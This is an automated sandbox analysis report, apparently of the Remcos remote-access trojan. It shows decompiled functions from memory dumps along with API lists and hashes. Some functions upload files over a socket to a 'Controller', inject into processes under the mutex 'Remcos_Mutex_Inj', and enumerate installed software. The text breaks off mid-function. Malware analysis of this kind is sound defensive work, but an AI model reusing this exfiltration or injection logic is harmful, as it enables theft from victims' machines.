Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00417C1B
Publisher, xrefs: 00417CAE
DisplayName, xrefs: 00417C9B
UninstallString, xrefs: 00417CFC
InstallDate, xrefs: 00417CEA
InstallLocation, xrefs: 00417CD8
DisplayVersion, xrefs: 00417CC3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 05422203580618e1de8e5d36feb4b4030bffa32296bddd461e91946ad577b465
Instruction ID: 4efbb3102b8a917cfe0ff116b1c7685e5740e714d91e440490eee53db017ab4b
Opcode Fuzzy Hash: 05422203580618e1de8e5d36feb4b4030bffa32296bddd461e91946ad577b465
Instruction Fuzzy Hash: 04814F719141189BDB14EB61DD52EEEB379AF50305F1040AFB90AB2192EF386F85CF68

Uniqueness

Uniqueness Score: -1.00%

Function 105DA3B4, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E105DA3B4(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46a188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E105D1063(_t46);
							E105D95F0( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E105D1063(_t47);
							E105D9AAA( *((intOrPtr*)(_t74 + 0x88)));
						}
						E105D1063( *((intOrPtr*)(_t74 + 0x7c)));
						E105D1063( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E105D1063( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E105D1063( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E105D1063( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E105D1063( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E105DA527( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E105D1063(_t31);
							E105D1063( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E105D1063(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E105D1063(_t74);
			}

0x105da3bc
0x105da3c0
0x105da3c8
0x105da3d1
0x105da3d6
0x105da3dd
0x105da3e5
0x105da3ed
0x105da3f8
0x105da3fe
0x105da3ff
0x105da407
0x105da40f
0x105da41a
0x105da420
0x105da424
0x105da42f
0x105da435
0x105da3d6
0x105da436
0x105da43e
0x105da451
0x105da464
0x105da472
0x105da47d
0x105da482
0x105da48b
0x105da493
0x105da494
0x105da49a
0x105da49d
0x105da4a0
0x105da4a7
0x105da4a9
0x105da4ad
0x105da4b5
0x105da4bc
0x105da4c2
0x105da4c3
0x105da4c3
0x105da4ca
0x105da4cc
0x105da4d1
0x105da4d9
0x105da4de
0x105da4df
0x105da4df
0x105da4e2
0x105da4e5
0x105da4e8
0x105da4eb
0x105da4eb
0x105da4fd

APIs

___free_lconv_mon.LIBCMT ref: 105DA3F8

Part of subcall function 105D95F0: _free.LIBCMT ref: 105D960D
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D961F
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D9631
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D9643
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D9655
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D9667
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D9679
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D968B
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D969D
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D96AF
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D96C1
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D96D3
Part of subcall function 105D95F0: _free.LIBCMT ref: 105D96E5

_free.LIBCMT ref: 105DA3ED

Part of subcall function 105D1063: HeapFree.KERNEL32(00000000,00000000,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?), ref: 105D1079
Part of subcall function 105D1063: GetLastError.KERNEL32(?,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?,?), ref: 105D108B

_free.LIBCMT ref: 105DA40F
_free.LIBCMT ref: 105DA424
_free.LIBCMT ref: 105DA42F
_free.LIBCMT ref: 105DA451
_free.LIBCMT ref: 105DA464
_free.LIBCMT ref: 105DA472
_free.LIBCMT ref: 105DA47D
_free.LIBCMT ref: 105DA4B5
_free.LIBCMT ref: 105DA4BC
_free.LIBCMT ref: 105DA4D9
_free.LIBCMT ref: 105DA4F1

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
Instruction ID: c529f46f091769caedd01da6a9406b68136f766985f7d1b49f4c9df0a6496d51
Opcode Fuzzy Hash: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
Instruction Fuzzy Hash: 31314D31600741AFEB209A3DE88DB47BBE9EF40290F11841BE459DB350EF75BD808B65

Uniqueness

Uniqueness Score: -1.00%

Function 00449546, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00449546(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46a188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E004401F5(_t46);
							E00448782( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E004401F5(_t47);
							E00448C3C( *((intOrPtr*)(_t74 + 0x88)));
						}
						E004401F5( *((intOrPtr*)(_t74 + 0x7c)));
						E004401F5( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E004401F5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E004401F5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E004401F5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E004401F5( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E004496B9( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E004401F5(_t31);
							E004401F5( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E004401F5(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E004401F5(_t74);
			}

0x0044954e
0x00449552
0x0044955a
0x00449563
0x00449568
0x0044956f
0x00449577
0x0044957f
0x0044958a
0x00449590
0x00449591
0x00449599
0x004495a1
0x004495ac
0x004495b2
0x004495b6
0x004495c1
0x004495c7
0x00449568
0x004495c8
0x004495d0
0x004495e3
0x004495f6
0x00449604
0x0044960f
0x00449614
0x0044961d
0x00449625
0x00449626
0x00449626
0x0044962c
0x0044962f
0x0044962f
0x00449632
0x00449639
0x0044963b
0x0044963f
0x00449647
0x0044964e
0x00449654
0x00449655
0x00449655
0x0044965c
0x0044965e
0x00449663
0x0044966b
0x00449670
0x00449671
0x00449671
0x00449674
0x00449677
0x0044967a
0x0044967d
0x0044967d
0x0044968f

APIs

___free_lconv_mon.LIBCMT ref: 0044958A

Part of subcall function 00448782: _free.LIBCMT ref: 0044879F
Part of subcall function 00448782: _free.LIBCMT ref: 004487B1
Part of subcall function 00448782: _free.LIBCMT ref: 004487C3
Part of subcall function 00448782: _free.LIBCMT ref: 004487D5
Part of subcall function 00448782: _free.LIBCMT ref: 004487E7
Part of subcall function 00448782: _free.LIBCMT ref: 004487F9
Part of subcall function 00448782: _free.LIBCMT ref: 0044880B
Part of subcall function 00448782: _free.LIBCMT ref: 0044881D
Part of subcall function 00448782: _free.LIBCMT ref: 0044882F
Part of subcall function 00448782: _free.LIBCMT ref: 00448841
Part of subcall function 00448782: _free.LIBCMT ref: 00448853
Part of subcall function 00448782: _free.LIBCMT ref: 00448865
Part of subcall function 00448782: _free.LIBCMT ref: 00448877

_free.LIBCMT ref: 0044957F

Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 004495A1
_free.LIBCMT ref: 004495B6
_free.LIBCMT ref: 004495C1
_free.LIBCMT ref: 004495E3
_free.LIBCMT ref: 004495F6
_free.LIBCMT ref: 00449604
_free.LIBCMT ref: 0044960F
_free.LIBCMT ref: 00449647
_free.LIBCMT ref: 0044964E
_free.LIBCMT ref: 0044966B
_free.LIBCMT ref: 00449683

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
Instruction ID: bc7df33f33a806a4e6538402b94214bd38d1e854ce5dbc401830de06ad29eac0
Opcode Fuzzy Hash: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
Instruction Fuzzy Hash: 46316B32600601AFFB21AA3AD845B5B73E8AF01354F21441FE659D7251DF3AAD509B2C

Uniqueness

Uniqueness Score: -1.00%

Function 10597310, Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 345
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10597310(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t118;
				void* _t120;
				void* _t127;
				long _t137;
				void* _t138;
				signed int _t139;
				struct _OVERLAPPED* _t146;
				signed int _t149;
				void* _t155;
				void* _t157;
				void* _t158;
				void* _t174;
				long _t199;
				signed int _t204;
				void* _t217;
				intOrPtr _t282;
				union _LARGE_INTEGER* _t296;
				void* _t298;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;

				_t279 = __edx;
				_v68 = __ecx;
				E105957F9(__ecx);
				_t303 = _t302 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t300 = _v68;
				E10595876(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t298 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t311 = _t298 - 0xffffffff;
				if(_t298 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					 *0x453268(_t298,  &_v80);
					_t204 = _v80.HighPart;
					_t118 = _v80;
					_v48 = _t204;
					_v32 = _t204;
					_v52 = _t118;
					_v16.LowPart = _t118;
					E105950ED(0,  &_v112, _a4);
					_t120 = E105A81A9( &_v136,  &_v112);
					_t304 = _t303 - 0x18;
					E10598430(0, _t304, 0x45f810, _t298, __eflags, _t120);
					_t305 = _t304 - 0x14;
					E10592EF2(0, _t305, "[Info]");
					E105A7AEE(0, _t298);
					_t306 = _t305 + 0x30;
					E10592E35();
					E10592D5E();
					_v36 = 1;
					_v40 = 0;
					_t127 = E105E16EE(_v52, _v48, 0x186a0, 0);
					_t211 = 0x45f810;
					asm("xorps xmm0, xmm0");
					_v88 = _t127 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = 0x45f810;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t298);
						E10595C79(_t300);
						_t199 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t137 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t282 = _v32;
									__eflags = _v20 - _t282;
									if(__eflags >= 0) {
										_t211 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t137 = _t211;
											_v20 = _t282;
											_v28 = _t137;
										} else {
											__eflags = _t137 - _t211;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t137);
									_t138 = E105C0334(_t211, _t282, _t300, __eflags);
									_push(0);
									_v12 = _t138;
									_v24 = 0;
									_t139 = SetFilePointerEx(_t298, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t139;
									if(_t139 == 0) {
										_t307 = _t306 - 0x18;
										_t217 = _t306 - 0x18;
										_push(0x45f838);
										goto L23;
									} else {
										_t149 = ReadFile(_t298, _v12, _v28,  &_v24, 0);
										__eflags = _t149;
										if(_t149 == 0) {
											_t307 = _t306 - 0x18;
											_t217 = _t306 - 0x18;
											_push(0x45f850);
											L23:
											E10592EF2(0, _t217);
											E10592EF2(0, _t307 - 0x18, 0x45f4f8);
											E105A7AEE(0, _t298);
											E105C033D(_v12);
											CloseHandle(_t298);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												E105C033D(_v12);
												CloseHandle(_t298);
												E10595C79(_t300);
												_t146 = 1;
												goto L25;
											} else {
												E105950ED(0,  &_v112, _a4);
												_t155 = E10592F19(0,  &_v472, _t282, __eflags, _v12, _v24);
												_t306 = _t306 - 0x18;
												_t157 = E105A80CE(0x46c238,  &_v448, _v88, _v84);
												_t158 = E105A80CE(0x46c238,  &_v424, _v36, _v40);
												E10593D8B(_t306, E10593E01(0x46c238,  &_v136, E10593E01(0x46c238,  &_v160, E10593E01(0x46c238,  &_v184, E10593D8B( &_v208, E10593E01(0x46c238,  &_v232, E10593D8B( &_v256, E10593E01(0x46c238,  &_v280, E10593E01(0x46c238,  &_v304, E10593E01(0x46c238,  &_v328, E10593E01(0x46c238,  &_v352, E10593E01(0x46c238,  &_v376, E105A820A(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t158), __eflags, 0x46c238), _t157), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t155);
												_t300 = _v68;
												_push(0x52);
												_t174 = E10595912(0x46c238, _v68, _t172, __eflags);
												__eflags = _t174 - 0xffffffff;
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592E35();
												E10592D5E();
												__eflags = 0x46c200 | _t174 == 0xffffffff;
												if((0x46c200 | _t174 == 0xffffffff) != 0) {
													E10595C79(_t300);
													CloseHandle(_t298);
													E105C033D(_v12);
													_t199 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									E105C033D(_v12);
									_t137 = _v28;
									_v16.LowPart = _v16 - _t137;
									_t296 = _v44;
									asm("sbb ecx, [ebp-0x10]");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t211 = _v64.HighPart.LowPart + _t137;
									_v64.HighPart = _t211;
									asm("adc edx, [ebp-0x10]");
									_v44 = _t296;
									__eflags = _t296 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t211 - _v52;
							} while (_t211 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E10592F5A(0, _t303 - 0x18, _t279, _t311,  &_a8);
					_push(0x53);
					E10595912(0, 0x46c2e8, _t279, _t311);
					L24:
					E10595C79(_t300);
					_t146 = 0;
					L25:
					_t199 = _t146;
				}
				L18:
				E10592E35();
				E10592E35();
				E10592E35();
				return _t199;
			}

0x10597310
0x1059731c
0x1059731f
0x10597324
0x1059732e
0x1059732f
0x10597330
0x10597331
0x10597332
0x10597337
0x1059733e
0x10597358
0x10597361
0x10597363
0x10597366
0x1059738a
0x1059738f
0x10597392
0x10597398
0x1059739b
0x105973a1
0x105973a4
0x105973aa
0x105973ad
0x105973b0
0x105973be
0x105973c3
0x105973ce
0x105973d3
0x105973dd
0x105973e2
0x105973e7
0x105973f0
0x105973f8
0x10597403
0x1059740e
0x10597414
0x1059741c
0x1059741e
0x10597421
0x10597424
0x10597426
0x1059742b
0x1059742e
0x10597431
0x105976d2
0x105976d3
0x105976db
0x105976e0
0x10597437
0x10597437
0x10597442
0x10597445
0x1059744b
0x1059744e
0x1059744e
0x10597453
0x10597453
0x10597453
0x10597453
0x10597456
0x10597459
0x1059745b
0x1059745e
0x10597464
0x10597464
0x10597466
0x10597469
0x10597460
0x10597460
0x10597462
0x00000000
0x00000000
0x10597462
0x1059745e
0x1059746c
0x1059746d
0x10597473
0x10597478
0x1059747e
0x10597482
0x10597488
0x1059748a
0x10597748
0x1059774b
0x1059774d
0x00000000
0x10597490
0x1059749d
0x105974a3
0x105974a5
0x1059773c
0x1059773f
0x10597741
0x10597752
0x10597752
0x10597761
0x10597766
0x1059776e
0x10597777
0x00000000
0x105974ab
0x105974ab
0x105974af
0x10597723
0x1059772a
0x10597732
0x10597739
0x00000000
0x105974b5
0x105974bb
0x105974cc
0x105974d1
0x105974ee
0x10597503
0x105975c2
0x105975c7
0x105975cb
0x105975cf
0x105975d4
0x105975e0
0x105975eb
0x105975f6
0x10597601
0x1059760c
0x10597617
0x10597622
0x1059762d
0x10597638
0x10597643
0x1059764e
0x10597659
0x10597664
0x1059766f
0x1059767a
0x10597682
0x10597687
0x10597689
0x10597707
0x1059770d
0x10597716
0x1059771c
0x00000000
0x00000000
0x00000000
0x10597689
0x105974af
0x105974a5
0x00000000
0x1059768b
0x1059768e
0x10597693
0x10597696
0x10597699
0x105976a0
0x105976a3
0x105976a7
0x105976af
0x105976b0
0x105976b3
0x105976b5
0x105976b8
0x105976bb
0x105976be
0x105976be
0x105976c7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x105976c9
0x105976c9
0x105976c9
0x00000000
0x10597439
0x10597439
0x1059743c
0x00000000
0x00000000
0x00000000
0x00000000
0x1059743c
0x10597437
0x10597368
0x10597371
0x10597376
0x1059737d
0x1059777d
0x1059777f
0x10597784
0x10597786
0x10597786
0x10597786
0x105976e2
0x105976e5
0x105976ed
0x105976f5
0x10597702

APIs

Part of subcall function 10595876: connect.WS2_32(?,0046DBA0,00000010), ref: 10595891

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1059735B
GetFileSizeEx.KERNEL32(00000000,?), ref: 10597392
__aulldiv.LIBCMT ref: 10597414
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 10597482
ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 1059749D

Part of subcall function 10595912: send.WS2_32(?,00000000,00000000,00000000), ref: 10595986

Part of subcall function 10595C79: closesocket.WS2_32(?), ref: 10595C7F

Strings

Uploading file to Controller: , xrefs: 105973C6
[Info], xrefs: 105973D8

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
String ID: Uploading file to Controller: $[Info]
API String ID: 1319223106-4259670467
Opcode ID: 2d05a661a40501580d00d11df3961e3b901cdc1a328e145ed3d3c9b916ec5bf8
Instruction ID: 2e9c20003c77b0033156f36b43e51e8c32ee12ce2963a53cbe8d7171966b36c9
Opcode Fuzzy Hash: 2d05a661a40501580d00d11df3961e3b901cdc1a328e145ed3d3c9b916ec5bf8
Instruction Fuzzy Hash: 2BC12B35E001189BCF04EFA4DC96AEEBB79EF88351F1081AAF405A6291EF316E45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE44, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 186
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040CE44(void* __eflags, char _a4) {
				void* _v8;
				char _v32;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v96;
				char _v120;
				char _v648;
				intOrPtr _v676;
				void* _v684;
				short _v1204;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				struct _SECURITY_ATTRIBUTES* _t106;
				char* _t111;
				void* _t158;
				void* _t161;

				_t106 = 0;
				GetModuleFileNameW(0,  &_v1204, 0x104);
				_t149 = "1";
				if(E00407744("1") != 0) {
					L14:
					E00401EFA( &_a4, _t149, _t159, E00416E1B(_t106,  &_v120, _t149));
					_t111 =  &_v120;
					E00401EF0();
					if(E00417614(_t111) != 0) {
						_push(_t111);
						if(E0040D4AF( &_a4, L"Program Files\\") != 0xffffffff) {
							E0040D4D0(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
						}
					}
					if(E0040EAE5( &_v1204,  &_a4) != 0) {
						L22:
						E00401EF0();
						return _t106;
					} else {
						L18:
						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
						E004020D5(_t106,  &_v96);
						E004179DC(E00401EEB(0x46c500),  &_v96);
						E00401F95( &_v96);
						if(E0041432B(E00401EEB( &_a4)) == 0) {
							CloseHandle(_t158);
						} else {
							_t106 = 1;
							E00410BB0(0x46c518, E00401F95(0x46c518), "Inj", 1);
						}
						E00401FC7();
						goto L22;
					}
				}
				E00401F6D(0,  &_v32);
				_t76 = CreateToolhelp32Snapshot(2, 0);
				_v8 = _t76;
				_v684 = 0x22c;
				Process32FirstW(_t76,  &_v684);
				while(Process32NextW(_v8,  &_v684) != 0) {
					E0040427F(_t106,  &_v56,  &_v648);
					_t157 = E0040230A( &_v56,  &_v60);
					_t159 = E004022CD( &_v56,  &_v64);
					E00408226( &_v72,  *((intOrPtr*)(E0040230A( &_v56,  &_v68))),  *_t84,  *_t82);
					_t161 = _t161 + 0xc;
					if(E00409EAC( &_a4) != 0) {
						E00401EFA( &_v32, _v676, _t159, E00417678( &_v120, _v676));
						E00401EF0();
						if(E00407744( &_v1204) == 0) {
							_t149 = 0x45f724;
							if(E00407744(0x45f724) != 0 || E00417642(_v676) != 0) {
								E00401EF0();
								L13:
								E00401EF0();
								goto L14;
							} else {
								E00409E56( &_v32);
								E00401EF0();
								break;
							}
						}
						E00401EF0();
						E00401EF0();
						goto L22;
					}
					E00401EF0();
				}
				CloseHandle(_v8);
				_t149 = 0x45f724;
				if(E00407744(0x45f724) != 0) {
					goto L13;
				}
				E00401EF0();
				goto L18;
			}

0x0040ce5c
0x0040ce5f
0x0040ce65
0x0040ce74
0x0040cfd5
0x0040cfe1
0x0040cfe6
0x0040cfe9
0x0040cff5
0x0040cff7
0x0040d008
0x0040d015
0x0040d015
0x0040d008
0x0040d02a
0x0040d0a4
0x0040d0a7
0x0040d0b4
0x0040d02c
0x0040d02c
0x0040d03d
0x0040d03f
0x0040d053
0x0040d05b
0x0040d075
0x0040d096
0x0040d077
0x0040d07e
0x0040d08c
0x0040d092
0x0040d09f
0x00000000
0x0040d09f
0x0040d02a
0x0040ce7d
0x0040ce85
0x0040ce91
0x0040ce96
0x0040cea0
0x0040cf07
0x0040ceb2
0x0040cec3
0x0040ced1
0x0040cee8
0x0040ceed
0x0040cefd
0x0040cf58
0x0040cf60
0x0040cf75
0x0040cf8c
0x0040cf9b
0x0040cfc8
0x0040cfd0
0x0040cfd0
0x00000000
0x0040cfac
0x0040cfb3
0x0040cfbb
0x00000000
0x0040cfbb
0x0040cf9b
0x0040cf7a
0x0040cf82
0x00000000
0x0040cf82
0x0040cf02
0x0040cf02
0x0040cf1e
0x0040cf24
0x0040cf36
0x00000000
0x00000000
0x0040cf3c
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,0046C578,00000000,00000001), ref: 0040CE5F
CreateToolhelp32Snapshot.KERNEL32 ref: 0040CE85
Process32FirstW.KERNEL32(00000000,?), ref: 0040CEA0
Process32NextW.KERNEL32(0040C873,0000022C), ref: 0040CF11
CloseHandle.KERNEL32(0040C873,?,00000000,?,?,?), ref: 0040CF1E
CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0040D034
CloseHandle.KERNEL32(00000000), ref: 0040D096

Part of subcall function 00417678: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041768D

Strings

Program Files (x86)\, xrefs: 0040D00A
Inj, xrefs: 0040D080
Remcos_Mutex_Inj, xrefs: 0040D02C
Program Files\, xrefs: 0040CFF8

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
API String ID: 193334293-694575909
Opcode ID: 55f3dd7fb2b55a96c3bd64f667631c5fd3453a660e7ed20f19c4ddaeb283a6ae
Instruction ID: 3510060cf9a437f77219ea037c9ff0ee2f7dfe89619f545013c5fab9df6787a0
Opcode Fuzzy Hash: 55f3dd7fb2b55a96c3bd64f667631c5fd3453a660e7ed20f19c4ddaeb283a6ae
Instruction Fuzzy Hash: FD6124309001099BCF14EFA1D9959EE7736AF10349F10417FB806771E2EF786E4ADA59

Uniqueness

Uniqueness Score: -1.00%

Function 00448880, Relevance: 18.4, APIs: 12, Instructions: 376
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00448880(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
